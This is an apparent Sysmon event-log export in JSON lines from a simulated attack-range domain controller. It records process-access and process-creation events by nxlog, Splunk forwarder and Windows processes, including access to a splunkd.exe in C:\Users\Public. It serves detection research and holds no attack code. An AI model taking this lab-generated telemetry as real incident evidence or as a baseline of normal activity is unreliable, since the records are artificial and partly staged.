{"EventTime":"2020-08-01 06:58:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:54.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:54.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:55.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:55.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.616\r\nProcessGuid: {E2A3D6B1-12B0-5F25-0000-0010AF6C0900}\r\nProcessId: 3844\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.616","ProcessGuid":"{E2A3D6B1-12B0-5F25-0000-0010AF6C0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12B0-5F25-0000-0010AF6C0900}\r\nTargetProcessId: 3844\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12B0-5F25-0000-0010AF6C0900}","TargetProcessId":"3844","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B0-5F25-0000-0010AF6C0900}\r\nTargetProcessId: 3844\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B0-5F25-0000-0010AF6C0900}","TargetProcessId":"3844","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 